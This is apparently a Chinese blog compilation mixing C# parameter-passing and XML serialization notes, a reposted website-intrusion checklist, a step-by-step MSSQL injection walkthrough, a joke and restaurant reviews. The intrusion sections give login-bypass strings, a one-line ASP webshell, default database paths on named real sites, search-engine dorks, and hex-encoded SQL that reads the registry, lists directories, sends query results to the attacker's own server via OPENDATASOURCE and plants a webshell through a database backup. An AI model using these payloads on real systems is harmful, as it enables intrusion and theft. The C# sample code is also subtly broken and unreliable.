1、分清变量是值类型还是引用类型。 如int是值类型，一般自定义的Class是引用类型。String的行为和值类型类似。

值类型变量，在栈中存值。引用类型变量，在堆中存值，在栈中存这个堆的地址。 即，变量都是通过栈存储的，值类型在栈中直接存值，引用类型在栈中存的是堆的地址。

2、不加限定符的参数传递（值传递）

这种情况下是值传递，即对于值类型，传入的是值，在函数中改变这个变量，不影响函数外的传入变量的值。
对于引用类型，如果改变传入的引用类型变量指向的堆里的内容， 显然函数执行后，引用类型变量指向的堆的内容会发生变化。
但是如果是仅改变引用类型的指向地址，则原引用类型变量的值（堆中的值）不会变化。

例： 
class Test()
{
     public int Col;

     public void Test()
    {
         x = new object();    // x变量 指向堆中的地址   0000x
         x.Col = 1;
         F(x);          //执行此操作后，x指向的堆的内容被改变。
         F2(x);    //执行此操作后，x的值不会发生变化。
    }

     public void F(Test x1 )
    {
        x1.Col = 20;  //这里的x1与传入前的x是两个变量，但指向同一个堆
    }
     public void F2(Test x2)
    {
        Test x3= new Test();
        x3.Col = 3;
        x2 = x3;
    }
} 

从例子中我们能看出，值传递传递的是变量在栈中的值，对于值类型他就是变量的值，对于引用类型，它是堆的地址。 在函数中，使用到的值传递的参数，实际会创建全新的变量， 来存储值类型的值，或者引用类型的堆地址。

3、引用传递
对于值类型变量，在定义函数和调用函数时使用out关键字进行限定，可以使该变量在函数内的变化影响到函数以外。这个限定符使函数内的变量和函数外的变量指向栈的同一位置（相当于是同一变量 ）。
对于引用类型，使用ref限定符达到同样功效。

综上所述，不使用限定符的情况下，值类型变量在函数内的变化不会影响到函数外的值。引用类型的变量，在函数内的变化具有不确定的特性。要看在函数内是否改变了其指向的堆的内容。   使用了out（对值类型变量）或ref（对引用类型变量）限定符的情况，会使变量在函数内外的值完全一致。

序列化对象到XML文件 Type type = typeof(RunSettings); XmlSerializer xmlSerializer = new XmlSerializer(type); FileStream fs1 = new FileStream("./settings.xml", FileMode.Create, FileAccess.Write); xmlSerializer.Serialize(fs1, this.RunSettings); fs1.Close(); 反序列化xml文件到对象 XmlSerializer xs = new XmlSerializer(typeof(RunSettings)); FileStream fs2 = new FileStream("./settings.xml", FileMode.Open, FileAccess.Read); Program.AppSettings = (RunSettings)xs.Deserialize(fs2); fs2.Close();

要序列化的类的前面要加：[Serializable]

直接设置全屏属性是有问题的。 可以通过将form设置为全屏，MediaPlayer控件设置为和Form同样大小的方式，来实现全屏。 如果想要隐藏控件自带的插入控制区，则可以把控件设的更高些，大概高出65像素的样子。

工具-->选项--->调试---->常规-->禁用"启动仅我的代码"

微软不把事情说明白，害苦了我们哦~~~~~~~~~~~

ds.Tables[0].Columns["ClassID"].ColumnName = "ID";

偶尔用到了，真的可以，以前没注意过。

[转载此文，纯为使站长知己知彼]

1.上传漏洞[不多讲] 
pS: 如果看到:选择你要上传的文件 [重新上传]或者出现“请登陆后使用”，80%就有漏洞了！ 
    有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.再用DOMAIN上传. 


2.注入漏洞[不多讲] 
pS:对MD5密码.有时我们不是哪么容易跑出来.如果是[SQL数据库].那么我们可以用以下命令: 
  http://注入网址;update admin set password=’新MD5密码’ where password=’旧MD5密码’--     [admin为表名.] 


3.旁注,也就是跨站. 
我们入侵某站时可能这个站坚固的无懈可击，我们可以找下和这个站同一服务器的站点，然后在利用这个站点用提权，嗅探等方法来入侵我们 要入侵的站点。，在这里有个难点，就是一些服务器的绝对路径经过加密，这就看我们的本事了 
  


4.暴库:把二级目录中间的/换成%5c 
EY:http://www.ahttc.edu.cn/otherweb ... s.asp?BigClassName=职责范围&BigClassType=1 
如果你能看到：’E:\ahttc040901\otherweb\dz\database\iXuEr_Studio.asa’不是一个有效的路径。 确定路径名称拼写是否正确，以及是否 连接到文件存放的服务器。 
这样的就是数据库了。下载时用FLASHGET换成.MDB格式的就行. 
  

5.’or’=’or’这是一个可以连接SQL的语名句.可以直接进入后台。我收集了一下。类似的还有： 
’or’’=’ " or "a"="a   ’) or (’a’=’a   ") or ("a"="a   or 1=1--   ’ or ’a’=’a 

6.社会工程学。这个我们都知道吧。就是猜解。 
　ＥＹ：http://www.neu.edu.cn/waishi/admin 
    admin   waishi 

７.写入ASP格式数据库。就是一句话木马[〈%execute request("value")%〉 ]，常用在留言本. 
ＥＹ：http://www.ahsdxy.ah.edu.cn/ebook/db/ebook.asp[这个就是ASP格式的数据库]，再写入一句话木马 
  

8.源码利用：一些网站用的都是网上下载的源码.有的站长很菜.什么也不改. 
EY:http://www.ahsdxy.ah.edu.cn/xiaoyoulu/index.asp 
这个站用的是：杰出校友录，源码我下过了， 
默认数据库/webshell路径：\database\liangu_data.mdb 后台管理：adm_login.asp 密码及用户名都是admin 
    

9.默认数据库/webshell路径利用:这样的网站很多/利人别人的WEBSHELL. 
/Databackup/dvbbs7.MDB 
/bbs/Databackup/dvbbs7.MDB 
/bbs/Data/dvbbs7.MDB 
/data/dvbbs7.mdb 
/bbs/diy.asp 
/diy.asp 
/bbs/cmd.asp 
/bbs/cmd.exe 
/bbs/s-u.exe 
/bbs/servu.exe 
工具：网站猎手 挖掘鸡 
EY：http://www.cl1999.com/bbs/Databackup/dvbbs7.MDB 

10.查看目录法:人一些网站可以断开目录，可以方问目录。 
EY：http://www.ujs168.com/shop/admin/ 
  http://escolourfvl.com/babyfox/admin/%23bb%23dedsed2s/ 
  这样我们可以找到数据库，下载不用我教吧 

11.工具溢出:.asp?NewsID=   /2j.asp?id=18   .asp?id=[这种方法可以取得大量的WEBSHELL] 
        
12.搜索引擎利用: 
  
(1).inurl:flasher_list.asp   默认数据库:database/flash.mdb   后台/manager/ 
(2).找网站的管理后台地址: 
site:xxxx.comintext:管理 
site:xxxx.comintitle:管理   〈关键字很多，自已找〉 
site:xxxx.cominurl:login 
(3).查找access的数据库,mssql、mysql的连接文件 
allinurl:bbsdata 
filetype:mdbinurl:database 
filetype:incconn 
inurl:datafiletype:mdb 
我主不做了。。自已做做吧。。 

13.COOKIE诈骗：把自己的ID修改成管理员的，MD5密码也修改成他的，用桂林老兵工具可以修改COOKIE。这个我就不多讲了 


14.利用常见的漏洞：如动网BBS 
EY：http://js1011.com/bbs/index.asp 
可以先用:dvbbs权限提升工具，使自已成为前台管理员。 
THEN，运用:动网固顶贴工具，找个固顶贴，再取得COOKIES，这个要你自已做。我们可以用WSockExpert取得Cookies/NC包 
这个我就不做了，网上教程多的是，自已下个看看。 
工具：dvbbs权限提升工具   动网固顶贴工具 

15.还有一些老漏洞。如IIS3，4的查看源码，5的DELETE 
  CGI，PHP的一些老洞，我就不说了啊。。太老了。没有什么大用途 

SQL注入高级技巧Nowthk篇

（2006-09-10 20:02）
我的目的主要是取得网站的目录,当然了,网站和mssql数据库在一台服务器上，权限DB_owner。　

在某官网发现了一个注点，一个’号提示"xxxxxxxxxx’0’’出现错误 " ，经过初步的分析是把单引号，直接转换成了0’,所以如果用工具肯定注入不了，实践证明工具不行，但能检测出来其权限为:DB_owner,手工检测的方法无非是: and 1=(select is_isvrolemember(’sysadmin’))这是简单检测系统权限。还好只是对单引号有限制，其它符号没有限制。不过这一点确实已经够麻烦的了。　

我们的目的是检测网站目录在什么地方，如果找到的话，直接差异备份数据库，取得webshell。　

首先提取IIS设置初期,网站目录在注册表中的位置，然后再暴出来。　
建一个表xy,;create table xy(xy1 nvarchar(256) null)，然后网表里插入其值，语句如下:　
;DECLARE @result varchar(255) EXEC master.dbo.xp_regread ’HKEY_LOCAL_MACHINE’,’SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots’,’/’,@result output insert into xy (xy1) values(@result)　
由于对’单引号的转换，所以上面的命令肯定成功不了，这时我们可以想到再用declare函数，一开始我的做法为把 ’HKEY_LOCAL_MACHINE’和’,’SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots’和’/’，这3个数据分别附于3个变量，这样语句构成为:　
;DECLARE @a varchar(255) select @a=0x484b45595f4c4f43414c5f4d414348494e45 DECLARE @b varchar(255) select @b=0x53595354454d5c434f4e54524f4c5365743030315c53657276696365735c57335356435c506172616d65746572735c56

69727475616c20526f6f7473 DECLARE @c varchar(255) select @c=0x2f DECLARE @result varchar(255) exec master.dbo.xp_regread @a,@b,@c,@result output insert xy(xy1) values(@result)--　

没想到根本成功不了，我不清楚这个原因，然后去百度搜索原因，在邪恶八讨论区里看到无敌遇到的情况根我一样，至今还没有讨论出来结果，于是这种方法暂时先放一放，2天以后再得到了一种新方法，也是用declare于一个变量附值，不过这时附的不是某一数据，而是整句。　

方法如下:　
DECLARE @result varchar(255) EXEC master.dbo.xp_regread ’HKEY_LOCAL_MACHINE’,’SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots’,’/’,@result output insert into xy (xy1) values(@result)　
全转换为16进制为:　
0x4400450043004C004100520045002000400072006500730075006C0074002000760061007200630068006100720028003200350035002900

2000450058004500430020006D00610073007400650072002E00640062006F002E00780070005F007200650067007200650061006400200027

0048004B00450059005F004C004F00430041004C005F004D0041004300480049004E00450027002C002700530059005300540045004D005C

0043006F006E00740072006F006C005300650074003000300031005C00530065007200760069006300650073005C005700330053005600430

05C0050006100720061006D00650074006500720073005C005600690072007400750061006C00200052006F006F007400730027002C0027002

F0027002C00400072006500730075006C00740020006F0075007400700075007400200069006E007300650072007400200069006E0074006F0

02000780079002000280078007900310029002000760061006C007500650073002800400072006500730075006C0074002900　
这时用DECLARE @S NVARCHAR(4000);SET @S=CAST(0x4400450043004C004100520045002000400072006500730075006C007400200076006100720063006800610072002800320035003500290

02000450058004500430020006D00610073007400650072002E00640062006F002E00780070005F007200650067007200650061006400200027

0048004B00450059005F004C004F00430041004C005F004D0041004300480049004E00450027002C002700530059005300540045004D005C00

43006F006E00740072006F006C005300650074003000300031005C00530065007200760069006300650073005C00570033005300560043005C

0050006100720061006D00650074006500720073005C005600690072007400750061006C00200052006F006F007400730027002C0027002F00

27002C00400072006500730075006C00740020006F0075007400700075007400200069006E007300650072007400200069006E0074006F00200

0780079002000280078007900310029002000760061006C007500650073002800400072006500730075006C0074002900 AS NVARCHAR(4000));EXEC(@S)　
直接执行成功，呵呵，反正没有用到单引号，这种方法是现在所能想出来的了，也算一点点小小的突破吧。　

把上述语句直接在浏览器里提交，返回正常的页面，然后用and 1=(selet top 1 xy1 from xy)成功暴出了网站的目录为d:\wwwfuck\，哈哈，怀着侥幸的心理直接在此目录下差异备份数据库，失败！结论：1、语句没有错误　2、目录有问题。　
于是现在猜一把，就猜网站目录在D盘，那么唯一可行的办法就是一个一个暴目录啊~，郁闷，极其麻烦的事情又要来临了！　
我比较懒，随后想到的就是sql里的opendatasource命令,我机器装有sql，IP为211.11.11.11，我想把远程执行sql返回的结果直接插到我自己机器sql所建的表中，所以这样比较轻松，为了证明是否成功，我先建一个表为ku(id nvarchar(255)),然后远程提交的格式为:　
insert into opendatasource(’sqloledb’,’server=211.11.11.11;uid=sa;pwd=fuck!!;database=test’).test.dbo.ku select name from master.dbo.sysdatabases　
其中test为我自己的库，ku为test库中的表名　如果成功的话，在本地打开ku表，上述语句就会列出远程服务器中所有的库的名称。　
上面的语句有单引号，我们直接转换为16进制，转换后用如下语句提交即可:　
;DECLARE @S NVARCHAR(4000);SET @S=CAST(0x69006E007300650072007400200069006E0074006F0020006F00700065006E00640061007400610073006F007500720063006500

28002700730071006C006F0

06C0065006400620027002C0027007300650072007600650072003D003200310031002E00310031002E00310031002E00310031003B007500690

064003D00730061003B007000770064003D006600750063006B00210021003B00640061007400610062006100730065003D0074006500730074002

70029002E0074006500730074002E00640062006F002E006B0075002000730065006C0065006300740020006E0061006D0065002000660072006F00

6D0020006D00610073007400650072002E00640062006F002E00730079007300640061007400610062006100730065007300 AS NVARCHAR(4000));EXEC(@S);　
直接打开本地数据库test中的ku表，嘿嘿，成功列出了远程所有数据库的名称。　
下面来返回服务器上D盘下的目录，嘿嘿，为了求速度，我只列一级目录。　

建一个表;create table temp(id nvarchar(255),num1 nvarchar(255))--成功　
往表里插入所有各级数目录(一级目录为D盘根目录，二级就是下一层，三级依次类推),语句：;insert into temp(id,num1) exec master.dbo.xp_dirtree ’D:\’，有单引号，上面的语句肯定不成功，肯定要用declare附值变量，好了，我直接写语句：　
DECLARE @S NVARCHAR(4000);SET @S=CAST(0x69006E007300650072007400200069006E0074006F002000740065006D00700028

00690064002C006E0075006D00310029002000650078006500630020006D00610073007400650072002E00640062006F002E00780070005F00

64006900720074007200650065002000270044003A005C002700 AS NVARCHAR(4000));EXEC(@S);　
那么现在temp表中，已经有了所有D盘的目录了，其中num1=1为一级目录,num1=2为二级..等等。　
好了，我把temp表中一级目录返回到本地吧　
本地建表mulu(name char(255)),远程语句:　
insert into opendatasource(’sqloledb’,’server=211.11.11.11;uid=sa;pwd=fuck!!;database=test’).test.dbo.mulu select id from temp where num1=1　
转成16进制declare附变量提交，**~~经过漫长由如死机的时间，失败了。。。弄不清楚原因，有知道的请联系我。　

既然懒的方法不行，算了，就勤快一些吧！郁闷！　
上述的temp远程表中还有目录名呢,太乱，在远程直接建个新表:;create talbe temp1(id nvarchar(4000))--然后把temp表中一级目录名称插到这里来，语句:;insert into temp1(id) select id from temp where num1=1--　
然后再暴: and 1=(select top 1 id from temp1 where id=1),提示:xxxxxxxxxxxx’MUbak’转换为int.....等出错等信息，我是不是很懒，连出错信息都不复制？明白就行了。　
暴下一个目录不可能用 and 1=(select top 1 id from temp1 where id not in(’MUbak’))吧？因为里面有单引号呀,不是上面说可以用declare吗?错!这是暴,可不是执行命令呀，不要弄错！　

抽了一根烟，想了想，还有一个办法，再把temp1的目录一层一层地扒下来，把他们传递给temp2表,呵呵，肯定要先建表了;create table temp2(id char(255))--。　
先想明白语句，我把temp1的id下所有的名称，给于temp2，而且不包括’MUbak’目录，那么语句应该是:　
insert into temp2(id) select id from temp1 where id not in(’MUbak’)　
呵呵，有单引号，declare!!!，上面语句转16进制。　
语句为:　
DECLARE @S NVARCHAR(4000);SET @S=CAST(0x69006E007300650072007400200069006E0074006F002000740065006D007000320028006900640029002000730065006C00650063007400200069

0064002000660072006F006D002000740065006D007000310020007700680065007200650020006900640020006E006F0074002000690

06E00280027004D005500620061006B0027002900 AS NVARCHAR(4000));EXEC(@S);　
这时，我在temp2暴表:and 1=(select top 1 id from temp2)，提示xxxxxxxxxxxx’wwwbak’转换为int.....等出错等信息。。呵呵，又一个目录出来了。　
然后删表temp2表，建temp3表，用上面的访法循环暴出下一个目录。　
可能有人问，为什么要建temp3表，直接删掉temp2，然后再建temp2再用呀，不过经验认为，这里最好新建一个，本人认为是缓存的原因，否则一直用老表，暴错的信息为同一个。。。。　

好了，经过漫长的时间，终于找出了网站的目录为D:\web\www\，下来备份呗。　
;create table riri(ri char(255))--　
;insert into riri(ri) values(0x3C25657865637574652872657175657374282261222929253E)-- ’0x3C25657865637574652872657175657374282261222929253E"为　
;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x443a5c7765625c7777775c312e617370 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT ’0x443a5c7765625c7777775c312e617370为D:\web\www\1.asp　
这时成功得在网站目录备分了一个1.asp，访问www.xxx.com/1.asp 出现’execute’错误，呵呵，一个webshell到手了。看得很麻烦吧，如果有人做出工具来了就简单多了，否则累死你~~ 哈哈，闪先~~

俺在网上找半天，NDOC也没找到好用的版本，只好自己动手写一下。好在LINQ TO XML让XML的处理简单了许多。

源码下载： XMLParse_ForVS2008.rar (69.82K) 登录后才能播放或下载

① One can’t deny that there is a certain degree of zhuangbility shown in his newly published yet already sold-out novel; as a matter of fact,it is the only quality that sells the book so well.  　　　他刚刚出版就已经销售一空的小说很明显带有一定程度的装逼性，对于这一点，没有人能够否认；事实上，正是装逼的特质使得这本书如此畅销。 www.luoyonghao.net
　　② If one claims and can prove that he or she has lived all their lives without betraying even one day his belief in zhuangbility, then we can safely conclude that the person is absolutely the first and the only symbol of niubility in human history ever!  　　如果一个人宣称他/一辈子没有一天不装逼并且能够拿出证据来，那我们就可以安全地得出以下结论：他/就是人类有史以来空前绝后独一无二的牛逼的象征！   

从：http://www.x-force.cn/article.asp?id=345　看到的，很有用的一篇文章。

以下均是来自青岛美食论坛广大网友的评价，本人搜集整理而成，仅做参考。

1、法耶：   菜难吃，价格高
2、俏江南   菜品一般，价格高得惊人
3、天德烤肉：烤肉一般，服务巨差
4、天府：   卫生条件差，服务差。
5、DOAO自助：用假鳕鱼肉冒充真鳕鱼，酒水回收再卖，曾有中毒事件。
6、九龙塘： 敦化路２４号的卫生条件差，白水三元每杯，青岛菜品，广东价格。
7、金汉斯   烤肉自助：吃不饱的自助，服务差，花钱吃饭像讨饭。
8、缘滋缘味  野生烧烤：一群托在美食论坛上忽悠人气。
9、风集坛子肉 江西路   一个字差
10、自助铁板烧台东 老板蛮横